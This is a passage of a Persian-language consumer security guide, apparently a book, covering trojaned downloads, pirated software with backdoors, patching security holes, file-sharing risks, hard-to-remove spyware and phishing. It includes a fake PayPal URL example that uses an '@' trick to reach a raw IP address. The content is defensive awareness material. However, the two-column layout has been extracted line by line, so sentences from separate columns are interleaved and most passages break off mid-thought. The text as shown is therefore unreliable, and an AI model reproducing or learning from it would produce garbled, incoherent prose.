ﻣﻲ ﺗﻮﺍﻧﻨﺪ ﻫﺮ ﻛﺎﺭﻱ ﻛﻪ ﺑﺮﻧﺎﻣﺔ ﺍﺻﻠﻲ ﺍﻧﺠﺎﻡ ﻣـﻲﺩﻫـﺪ -ﻣﺎﻧﻨـﺪ
ﺩﺭﺧﻮﺍﺳــﺖ ﻣــﻲﻛﻨــﺪ ﻭ ﺁﻥ ﺑﺮﻧﺎﻣــﻪ ﻧﻴــﺰ ﻳــﻚ ﺑﺮﻧﺎﻣــﺔ ﺩﻳﮕــﺮ ﺭﺍ
ﺧﻮﺍﻧﺪﻥ ﺍﺯ ﺩﻳـﺴﻚ ﻭ ﻧﻮﺷـﺘﻦ ﺭﻭﻱ ﺁﻥ ﻳـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺍﺭﺗﺒـﺎﻁ
downloadﻣــﻲﻧﻤﺎﻳــﺪ ،ﺁﻧــﺮﺍ ﺍﺟــﺮﺍ ﻣــﻲﻧﻤﺎﻳــﺪ ،ﻳــﺎ ﻃــﻮﺭﻱ
ﺷﺒﻜﻪ -ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﻫﻨﺪ ،ﻭ ﻟﺬﺍ ﺗﻨﻬﺎ ﺑﺎﻳﺪ ﺯﻣـﺎﻧﻲ ﻧـﺼﺐ ﺷـﻮﻧﺪ ﻭ
ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﻣﻲﻛﻨﺪ ﻛﻪ ﺩﺭ ﺁﻳﻨﺪﻩ ﺑﺘﻮﺍﻧﺪ ﺁﻧـﺮﺍ ﺑـﻪ ﺍﺟـﺮﺍ ﺩﺭ ﺁﻭﺭﺩ.
ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻧﺪ ﻛﻪ ﻣﺒﺪﺃ ﺑﻄﻮﺭ ﻛﺎﻣﻞ ﻣـﻮﺭﺩ ﺍﻃﻤﻴﻨـﺎﻥ
ﻫﻤﭽﻨﻴﻦ ﻛﺪ HTMLﻣﻲﺗﻮﺍﻧﺪ ﻭﺍﺭﺩ ﻧﺎﻣـﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﮔـﺮﺩﺩ.
ﺑﺎﺷﺪ.
ﺍﮔﺮ ﺑﻪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ Javaﻳﺎ ActiveXﺑـﺪﻭﻥ ﺍﻳﻨﻜـﻪ ﺍﺯ ﺷـﻤﺎ
ﺍﺟﺎﺯﻩ ﺑﮕﻴﺮﻧﺪ ﻭ ﻳﺎ ﺣﺘﻲ ﺑﻪ ﺷﻤﺎ ﺍﻃﻼﻉ ﺩﻫﻨﺪ ﺍﺟﺎﺯﺓ ﻧﺼﺐ ﻛﺮﺩﻥ ﺣﻔﺮﻩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ
ﺑﺮﻧﺎﻣﻪ ﺩﺍﺩﻩ ﺑﺎﺷﻴﺪ ،ﺁﻧﮕﺎﻩ ﺧﻮﺍﻫﻨﺪ ﺗﻮﺍﻧﺴﺖ downloadﺷﻮﻧﺪ ﻭ
ﻫﺮﭼﻪ ﺭﺍ ﻛﻪ ﻣﻲﺧﻮﺍﻫﻨﺪ ﻧﺼﺐ ﻧﻤﺎﻳﻨﺪ. ﺣﻔﺮﻩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺍﺷﻜﺎﻻﺗﻲ ﺩﺭ ﺑﺨﺸﻬﺎﻳﻲ ﺍﺯ ﺳﻴﺴﺘﻢ ﻋﺎﻣـﻞ ﻳـﺎ
ﺩﻳﮕﺮ ﺍﺟﺰﺍﻱ ﺳﻴﺴﺘﻢ ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﻪ ﻣﻬﺎﺟﻢ ﺍﺟﺎﺯﺓ ﺩﺳﺘﺮﺳـﻲ ﺑـﻪ
ﺑﻲﺍﻋﺘﻤﺎﺩﻱ ﺑﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺴﺮﻭﻗﻪ ﺍﻃﻼﻋﺎﺕ ﻣﻮﺟﻮﺩ ﺩﺭ ﺳﻴﺴﺘﻢ ﻳﺎ ﻛﻨﺘﺮﻝ ﺁﻧﺮﺍ ﻣﻲﺩﻫﻨﺪ .ﺩﺭ ﺳﺎﻟﻬﺎﻱ
ﺍﺧﻴﺮ ﺍﻛﺜﺮ ﺗﻮﻟﻴﺪﻛﻨﻨﺪﮔﺎﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺑـﺎ ﺳـﺮﻋﺖ ﻗﺎﺑـﻞ ﻗﺒـﻮﻟﻲ ﺑـﻪ
ﻣﻔﻬﻮﻡ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺗﺠﺎﺭﻱ ﻣﺴﺮﻭﻗﻪ ﻣﻔﻬﻮﻡ ﺗﺎﺯﻩﺍﻱ ﻧﻴﺴﺖ .ﭼﻨـﺪﻳﻦ
ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﻛﻪ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻳﺸﺎﻥ ﻛﺸﻒ ﻣﻲﺷـﻮﺩ ﭘﺎﺳـﺦ
ﺳﺎﻝ ﺍﺳﺖ ﻛﻪ ﺩﻳﺴﻜﻬﺎﻱ ﻓﺸﺮﺩﺓ ﺟﻌﻠـﻲ ﻓﺮﻭﺧﺘـﻪ ﻣـﻲﺷـﻮﻧﺪ ﻭ
ﻣﻲﺩﻫﻨﺪ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﺍﮔﺮ ﺑﺼﻮﺭﺕ ﻣﻨﻈﻢ ﻭﺻﻠﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺭﻭﻱ
ﻧﺴﺨﻪﻫﺎﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺁﻧﻬﺎ -ﻛﻪ Warezﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﻧﺪ -ﻧﻴﺰ
ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺍﻋﻤﺎﻝ ﻛﻨﻴﺪ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﻗﺒـﻞ ﺍﺯ ﺍﻧﺘـﺸﺎﺭ ﮔـﺴﺘﺮﺩﺓ
ﺭﺍﻳﺞ ﻫﺴﺘﻨﺪ .ﺍﺯ ﻣﺪﺗﻬﺎ ﭘﻴﺶ ﺍﻳﻦ ﺳﻮﺀ ﻇﻦ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﻛﻪ ﺍﻳﻦ
ﺍﺷﻜﺎﻻﺕ ،ﺭﺍﻫﻬﺎﻱ ﻧﻔﻮﺫ ﺭﺍ ﺑﺮ ﻣﻬﺎﺟﻤﺎﻥ ﺑﺒﻨﺪﻳﺪ.
ﺩﻳﺴﻜﻬﺎﻱ ﻓﺸﺮﺩﻩ ﻣﻲ ﺗﻮﺍﻧﻨﺪ ﺣﺎﻭﻱ ﻭﻳﺮﻭﺱ ﺑﺎﺷﻨﺪ ،ﺍﻣﺎ ﺍﺣﺘﻤـﺎﻝ
ﺑﻴﺸﺘﺮﻱ ﻛﻪ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺍﻳﻦ ﻧﻮﻉ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﻤﻜـﻦ ٥٩
ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻠﻬﺎ
ﺍﺳﺖ ﺗﻌﻤﺪﹰﺍ ﺣﺎﻭﻱ ﻭﺻﻠﻪﺍﻱ ﺑﺎﺷﺪ ﻛﻪ ﻳﻚ ﻓﺮﺩ ﻏﻴﺮ ﻣﺠﺎﺯ ﺭﺍ ﻗﺎﺩﺭ
ﻣﻲﺳﺎﺯﺩ ﻛﻪ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﺑﻪ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﻨﺪ. ﺑــﻪﺍﺷــﺘﺮﺍﻙﮔــﺬﺍﺭﻱ ﻓﺎﻳــﻞ ﺩﺭ ﺍﺷــﻜﺎﻝ ﻣﺨﺘﻠــﻒ ﺩﺭ ﻫﻤــﺔ
ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻧﺼﺐ ﺍﻏﻠﺐ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﺑﻪ ﺍﻣﺘﻴﺎﺯ ﺩﺳﺘﺮﺳﻲ ﺭﺍﻫﺒـﺮﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﺍﺷـﺘﺮﺍﻙ ﻓﺎﻳـﻞ ﺩﺭ ﻣﻴـﺎﻥ ﻛﺎﺭﻣﻨـﺪﺍﻥ
ﻧﻴــﺎﺯ ﺩﺍﺭﺩ ،ﺍﻳــﻦ ﺭﻭﺵ ﻓﺮﺻــﺖ ﻣﻨﺎﺳــﺒﻲ ﺑــﺮﺍﻱ ﻧــﺼﺐ ﺷــﺪﻥ ﻳﻚ ﺷﺮﻛﺖ ﻛﺎﺭ ﺑـﺴﻴﺎﺭ ﻣﻔﻴـﺪﻱ ﺍﺳـﺖ .ﺍﮔـﺮ ﭼﻨـﺪﻳﻦ ﺩﺳـﺘﮕﺎﻩ
ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ ﺷﻤﺎ ﺁﻧﻬﺎ ﺭﺍ ﺩﺭﺧﻮﺍﺳﺖ ﻧﻜﺮﺩﻩﺍﻳﺪ ﻓﺮﺍﻫﻢ ﻣﻲﺁﻭﺭﺩ. ﻣﺨﺘﻠﻒ ﺩﺍﺭﻳﺪ ،ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻞ ﻣﻴﺎﻥ ﺁﻧﻬﺎ ﻳﻚ ﻗﺎﺑﻠﻴﺖ ﺑﺴﻴﺎﺭ ﻣﻮﺭﺩ
ﻧﻴﺎﺯ ﺧﻮﺍﻫﺪ ﺑﻮﺩ .ﺑﺎ ﺍﻳـﻦ ﻭﺟـﻮﺩ ﺍﮔـﺮ ﺍﺯ ﺭﻭﺵ ﺍﺷـﺘﺮﺍﻙ ﻓﺎﻳـﻞ ﺍﺯ
ﻋﻤﻠﻜﺮﺩﻫﺎﻱ ﭘﻨﻬﺎﻥ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺳﺎﻟﻢ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴـﺪ ﻭ ﺳﻴﺎﺳـﺖ ﺍﻣﻨﻴﺘـﻲ ﻣﻨﺎﺳـﺒﻲ
ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ )ﻣﺜﻞ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ ﻣﻨﺎﺳـﺐ ﻭ ﻣﺤـﺪﻭﺩ
ﺍﮔﺮﭼﻪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺍﻛﺜـﺮ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻳﻲ ﻛـﻪ download
ﺑﻮﺩﻥ ﺍﻣﺘﻴﺎﺯ ﻧﻮﺷﺘﻦ ﻭ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ( ﻧﺪﺍﺭﻳـﺪ ،ﺁﻧﮕـﺎﻩ ﻫـﺮ ﻣﻬـﺎﺟﻤﻲ ﺩﺭ
ﻣﻲﻛﻨﻴﺪ ﺳﺎﻟﻢ ﺑﺎﺷﻨﺪ ،ﺍﻣﺎ ﺍﺣﺘﻤﺎﻝ ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻧﺮﻡﺍﻓﺰﺍﺭ
ﺩﻧﻴﺎ ﻫﻢ ﺧﻮﺍﻫﺪ ﺗﻮﺍﻧﺴﺖ ﻓﺎﻳﻠﻬﺎﻱ ﺷﻤﺎ ﺭﺍ ﺑـﻪ ﺍﺷـﺘﺮﺍﻙ ﺑﮕـﺬﺍﺭﺩ.
downloadﺷﺪﻩ )ﻣﺨﺼﻮﺻﹰﺎ ﻧﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﺭﺍﻳﮕـﺎﻥ( ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ
ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﺍﮔﺮ ﺑﻪ ﺩﻳﮕﺮﺍﻥ ﺍﺟﺎﺯﻩ ﺩﻫﻴﺪ ﻛـﻪ ﺭﻭﻱ ﺩﻳـﺴﻜﻬﺎﻱ
ﺩﻳﮕﺮﻱ ﺭﺍ ﺭﻭﻱ ﺩﺳﺘﮕﺎﻩ ﺷﻤﺎ ﻧﺼﺐ ﻧﻤﺎﻳﺪ .ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﺷـﺘﺮﺍﻙ
ﺷﻤﺎ ﺍﻣﻜﺎﻥ ﻧﻮﺷﺘﻦ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ،ﺁﻧﮕﺎﻩ ﻣﻬﺎﺟﻢ ﺧﻮﺍﻫﺪ ﺗﻮﺍﻧـﺴﺖ
ﻣﺘﻘﺎﺑﻞ ﻓﺎﻳﻠﻬﺎ ٦١ﺑﺴﻴﺎﺭ ﻣـﺴﺘﻌﺪ ﭼﻨـﻴﻦ ﻭﺿـﻌﻴﺘﻲ ﻫـﺴﺘﻨﺪ .ﺍﻳـﻦ
ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺭﺍ ﺑﻪ ﺷﻜﻞ ﺩﻟﺨﻮﺍﻩ ﺧﻮﺩ ﺗﻨﻈﻴﻢ ﻛﻨﺪ.
ﻻ ﺷﺎﻣﻞ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﺩﻳﮕـﺮﻱ ﻣـﻲﺑﺎﺷـﻨﺪ ﻛـﻪ ﺑﺮﻧﺎﻣﻪﻫﺎ ﻣﻌﻤﻮ ﹰ
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺁﻧﻬﺎ ﺩﺭ ﻧﻮﻉ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺭﺩﻳـﺎﺑﻲ ﻭ ﺍﻋﻤـﺎﻝ ﺗﻐﻴﻴـﺮ ﺩﺭ
ﻭﺏ ﻃﺒﻘﻪﺑﻨﺪﻱ ﻣﻲﺷﻮﻧﺪ ﻭ ﮔﺮﺩﺵ ﻭﺏ ﺷﻤﺎ ﺭﺍ ﻧﻈﺎﺭﻩ ﻣﻲﻛﻨﻨـﺪ،
ﺍﮔﺮ ﻓﺮﺩﻱ ﺑﺎ ﺭﻳﺰﻩﻛﺎﺭﻳﻬـﺎﻱ ﻗﺎﻟـﺐ URLﺁﺷـﻨﺎ ﻧﺒﺎﺷـﺪ ﺗـﺼﻮﺭ ﺍﻧﻮﺍﻉ ﺗﺒﻠﻴﻐﺎﺕ ﺭﺍ ﺑﻪ ﻧﻤﺎﻳﺶ ﺩﺭﻣﻲﺁﻭﺭﻧﺪ ﻭ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺷـﻤﺎ ﺭﺍ ﺑـﻪ
ﻣﻲﻛﻨﺪ ﻛﻪ ﺍﻳﻦ ﺁﺩﺭﺱ ﻫﻤﺎﻥ www.paypal.comﺍﺳـﺖ ﻭ ﻣــﺪﻳﺮ ﺧــﻮﺩ ﮔــﺰﺍﺭﺵ ﻣــﻲﻧﻤﺎﻳﻨــﺪ .ﺑﺮﺧــﻲ ﺍﺯ ﺍﻳــﻦ ﺑﺮﻧﺎﻣــﻪﻫــﺎ
ﻟﺬﺍ ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ﻣﻲ ﺑﺎﺷﺪ ،ﺍﻣﺎ ﺩﺭ ﺣﻘﻴﻘﺖ ﻧﺒﺎﻳـﺪ ﻛﺎﺭﺍﻛﺘﺮﻫـﺎﻳﻲ ﺩﺳﻴﺴﻪﺁﻣﻴﺰ ﻫﺴﺘﻨﺪ ،ﺑﺪﻳﻦ ﺻﻮﺭﺕ ﻛﻪ ﺳﻌﻲ ﺩﺍﺭﻧﺪ ﺧﻮﺩ ﺭﺍ ﭘﻨﻬﺎﻥ
ﻛﻪ ﻗﺒﻞ ﺍﺯ ﻋﻼﻣﺖ @ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪﺍﻧﺪ ﺭﺍ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺖ؛ ﺯﻳﺮﺍ ﺍﻳﻦ ﻛﻨﻨﺪ ﻭ ﺗﻘﺮﻳﺒﹰﺎ ﻏﻴﺮ ﻗﺎﺑﻞ ﺣﺬﻑ ﺑﺎﺷـﻨﺪ .ﭼﻨـﻴﻦ ﺑﺮﻧﺎﻣـﻪﺍﻱ ﺩﺍﺭﺍﻱ
ﻻ
URLﺑﻪ ﺁﺩﺭﺱ 218.5.79.162ﻣﺘﺼﻞ ﻣﻲ ﺷـﻮﺩ .ﻣﻌﻤـﻮ ﹰ ﻳﻚ ﺍﺑﺰﺍﺭ uninstallﺍﺳﺖ ﻛﻪ ﺍﮔﺮ ﺁﻧـﺮﺍ ﺍﺟـﺮﺍ ﻛﻨﻴـﺪ ،ﺁﻥ ﺍﺑـﺰﺍﺭ
ﺩﺭ ﺍﻳــﻦ ﭘﺎﻳﮕــﺎﻩ ﻭﺏ ﻧﻴــﺰ ﺻــﻔﺤﻪﺍﻱ ﻣــﺸﺎﺑﻪ ﺻــﻔﺤﺔ ﻭﺍﻗﻌــﻲ uninstallﺭﺍ ﭘﺎﻙ ﻣﻲ ﻛﻨﺪ ،ﻭﻟﻲ ﺑﺮﻧﺎﻣـﺔ ﺍﺻـﻠﻲ ﻫﻨـﻮﺯ ﻭﺟـﻮﺩ
PayPalﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺷـﺪﻩ ﻭ ﺍﺯ ﺷـﻤﺎ ﻣـﻲﺧﻮﺍﻫـﺪ ﻛـﻪ ﻭﺍﺭﺩ ﺁﻥ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ ﻭ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﺧﻮﺍﻫﺪ ﺁﻣﺪ.
ﺷﻮﻳﺪ ﻭ ﺷﻤﺎﺭﺓ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺧﻮﺩ ﺭﺍ ﻭﺍﺭﺩ ﻧﻤﺎﻳﻴﺪ .ﺩﺭﻭﺍﻗﻊ ﺍﻳـﻦ
ﺑﺨﺶ ﺩﻭﻡ
٦٢
ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻫﺮﮔﺰ ﺑﻪ PayPalﻣﺘﺼﻞ ﻧﻤﻲﺷﻮﺩ ،ﺑﻠﻜـﻪ ﻣﺘﻌﻠـﻖ ﺑﺪﺍﻓﺰﺍﺭﻫﺎﻱ ﻏﻴﺮﻣﺎﻧﺪﮔﺎﺭ
ﺑﻪ ﻓﺮﺩﻱ ﺍﺳﺖ ﻛﻪ ﺳﻌﻲ ﺩﺍﺭﺩ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺷﻤﺎ ﻭ ﺍﻃﻼﻋـﺎﺕ ﻫﻤﺔ ﺑﺪﺍﻓﺰﺍﺭﻫﺎ ﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺍﺟﺮﺍ ﻧﻤﻲﺷﻮﻧﺪ .ﺑﺴﻴﺎﺭ ﺭﺍﻳﺞ ﺷﺪﻩ
ﻣﺮﺑﻮﻁ ﺑﻪ ﺁﻧﺮﺍ ﺑﻪ ﺳﺮﻗﺖ ﺑﺒﺮﺩ .ﺍﻳـﻦ ﺣﻴﻠـﻪﻫـﺎ ﺩﺭ ﻋﻤـﻞ ﺑـﺴﻴﺎﺭ ﻛﻪ ﺍﻳﻦ ﻧﺮﻡﺍﻓﺰﺍﺭﻫـﺎ ﻳـﻚ ﻧﺎﻣـﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑﻔﺮﺳـﺘﻨﺪ ﻭ ﺩﺭ ﺁﻥ
ﻣﻮﻓﻘﻴﺖ ﺁﻣﻴـﺰ ﺑـﻮﺩﻩﺍﻧـﺪ .ﺗﻮﺟـﻪ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ ﻛـﻪ ﻧﺎﻣـﻪﻫـﺎﻱ ﻛﺎﺭﺑﺮ ﺭﺍ ﺑﻪ ﻧﺤﻮﻱ ﺗﺮﻏﻴﺐ ﺑﻪ ﻣـﺸﺎﻫﺪﺓ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﻣـﻮﺭﺩ ﻧﻈـﺮ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﺸﺎﺑﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻧﺎﻣﻪﻫﺎﻱ ﺳﺎﻟﻢ ﻭ ﻣﺸﺮﻭﻉ ﺑﺎﺷﻨﺪ ﺧﻮﺩ ﻧﻤﺎﻳﻨﺪ .ﺭﻭﺵ ﺳﻨﺘﻲ ﺣﻴﻠﻪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻧﺎﻣـﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ
ﻛﻪ ﻭﺍﻗﻌﹰﺎ ﺍﺯ ﻃﺮﻑ PayPalﺍﺭﺳﺎﻝ ﺷﺪﻩﺍﻧﺪ. ﺑﻪ ﺷﻤﺎ ﭼﻴﺰﻱ ﭘﻴﺸﻨﻬﺎﺩ ﻣﻲﺩﻫﺪ ﻛﻪ ﺑﺪﺍﻥ ﻋﻼﻗﻤﻨﺪ ﻫـﺴﺘﻴﺪ ﺍﻣـﺎ
ﻲ ﺭﺳﻤﻲ ﻛﻪ ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﺍﺭﺳـﺎﻝ ﻣـﻲﺷـﻮﺩ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜ ﹺ ﻫﻨﮕﺎﻣﻴﻜﻪ ﻣﺸﻐﻮﻝ ﻣـﺸﺎﻫﺪﺓ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﻣﻌﺮﻓـﻲﺷـﺪﻩ ﻫـﺴﺘﻴﺪ
ﻻ ﺷﺎﻣﻞ ﺍﻃﻼﻋﺎﺕ ﻣﻨﺤﺼﺮ ﺑﻪ ﻓﺮﺩﻱ ﺍﺳـﺖ ﻛـﻪ ﺍﺯ ﺁﺩﺭﺱ ﻣﻌﻤﻮ ﹰ ﺗﻌﺪﺍﺩﻱ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺨﺮﺏ ﺑﻪ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺣﻤﻠﻪ ﻣﻲﻛﻨﻨﺪ ﻭ ﺷﺎﻳﺪ
ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺷﻤﺎ ﻧﻤﻲﺗﻮﺍﻥ ﺁﻧﻬﺎ ﺭﺍ ﺑﺪﺳﺖ ﺁﻭﺭﺩ؛ ﺍﻃﻼﻋﺎﺗﻲ ﻧﻮﻋﻲ ﻧـﺮﻡ ﺍﻓـﺰﺍﺭ ﺭﺍ ﺭﻭﻱ ﺳﻴـﺴﺘﻢ downloadﻛـﺮﺩﻩ )ﻣـﺸﺎﺑﻪ
ﻧﻈﻴﺮ ﻧﺎﻡ ﻛﺎﻣﻞ ﻭ ﻳﺎ ﭼﻬﺎﺭ ﺭﻗﻢ ﺁﺧﺮ ﻛﺎﺭﺕ ﺍﻋﺘﺒـﺎﺭﻱ ﺷـﻤﺎ .ﺍﮔـﺮ "ﻫﺪﺍﻳﺖ ﺑﻮﺳﻴﻠﻪ downloadﻫﺎ"( ﻭ ﻳﺎ ﻋﻤﻠﻴﺎﺕ ﺩﻳﮕﺮﻱ ﺍﻧﺠﺎﻡ ﺩﻫﻨﺪ.
ﺍﻳﻦ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺷﻤﺎ ﺭﺍ ﺑﻪ ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻫﺪﺍﻳﺖ ﻛﻨﺪ ،ﺑﻪ ﺩﺭ ﺭﻭﺷــﻬﺎﻱ ﺟﺪﻳــﺪﺗﺮ ،ﻧﺎﻣــﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ﺍﺩﻋــﺎ ﻣــﻲﻛﻨــﺪ ﻛــﻪ
ﺷﻤﺎ ﺁﺩﺭﺱ ﺁﻧﺮﺍ ﻧﻴﺰ ﺧﻮﺍﻫﺪ ﺩﺍﺩ ،ﺍﻣﺎ ﺩﺭ ﺁﻥ ﻫﻴﭻ ﺍﺭﺗﺒـﺎﻁ ﺻـﻔﺤﻪ ﺻﻮﺭﺗﺤـــﺴﺎﺑﻲ ﺍﺯ ) eBayﭘﺎﻳﮕـــﺎﻩ ﻭﺏ ﻣﺰﺍﻳـــﺪﻩ ﺩﺭ ﺍﻳﻨﺘﺮﻧـــﺖ( ﻳـــﺎ
ﻭﺏ ٦٣ﻭﺟــﻮﺩ ﻧــﺪﺍﺭﺩ .ﻫﻤﭽﻨــﻴﻦ ﺻــﻔﺤﺎﺕ ﻭﺏ ﻣﻘــﺼﺪ ﺷــﺎﻣﻞ ) PayPalﻳﻚ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺑﺮﺍﻱ ﭘﺮﺩﺍﺧﺘﻬﺎﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ( ﻭ ﻳـﺎ ﺍﺯ ﻃـﺮﻑ
ﺍﻃﻼﻋﺎﺗﻲ ﻫـﺴﺘﻨﺪ ﻛـﻪ ﻫـﻴﭻ ﻛﻼﻫﺒـﺮﺩﺍﺭ ﻳـﺎ ﻫﺮﺯﻧﺎﻣـﻪﻧﻮﻳـﺴﻲ ﺑﺎﻧﻚ ﺷﻤﺎ ﺍﺳﺖ .ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺴﻴﺎﺭ ﻣﻄﻤﺌﻦ ﺑﻨﻈﺮ ﻣﻲ ﺭﺳﺪ
ﻧﻤﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺁﻥ ﺍﻃﻼﻉ ﺩﺍﺷﺘﻪﺑﺎﺷـﺪ .ﺍﮔـﺮ ﺑـﺎﺯﻫﻢ ﺩﺭ ﺍﻳـﻦ ﻣـﻮﺭﺩ ﻭ ﺑﻪ ﺷﻤﺎ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺑﻲ ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ ﻛﻪ ﺩﺭ ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻧﻴـﺪ
ﺗﺮﺩﻳﺪ ﺩﺍﺷﺘﻴﺪ ،ﺑﺮﺍﻱ ﻛﺴﺐ ﺍﻃﻤﻴﻨﺎﻥ ﺑﻴﺸﺘﺮ ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺍﺯ ﻃﺮﻳـﻖ ﻻ
ﺷﻤﺎﺭﺓ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺧـﻮﺩ ﺭﺍ ﺗـﺄﻣﻴﻦ ﺍﻋﺘﺒـﺎﺭ ﻧﻤﺎﻳﻴـﺪ .ﻣﻌﻤـﻮ ﹰ
ﺗﻠﻔﻦ )ﻭ ﻧﻪ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ( ﺑﺎ ﺷﺮﻛﺖ ﻣﺮﺑﻮﻃﻪ ﺗﻤﺎﺱ ﺑﮕﻴﺮﻳﺪ ﻭ ﺍﺯ URLﻫﺎﻳﻲ ﻛﻪ ﺍﻳﻦ ﻧﺎﻣﻪﻫﺎ ﻣﻌﺮﻓﻲ ﻣﻲﻛﻨﻨﺪ ﻧﻴﺰ ﺑـﺎ URLﻫـﺎﻱ
ﺍﺻﺎﻟﺖ ﻧﺎﻣﺔ ﺍﺭﺳﺎﻟﻲ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ. ﻣﻌﺘﺒــﺮ ﺑــﺴﻴﺎﺭ ﻣــﺸﺎﺑﻬﺖ ﺩﺍﺭﺩ .ﺑﻌﻨــﻮﺍﻥ ﻣﺜــﺎﻝ URLﻭﺍﻗﻌــﻲ
،PayPalﺁﺩﺭﺱ www.paypal.comﺍﺳــﺖ ،ﻭ URLﻱ
ﻛﻪ ﺩﺭ ﻧﺎﻣﻪ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻧﻤﺎﻳﺶ ﺩﺍﺩﻩ ﻣﻲﺷﻮﺩ ﻧﻴﺰ ﻣﻤﻜﻦ ﺍﺳـﺖ
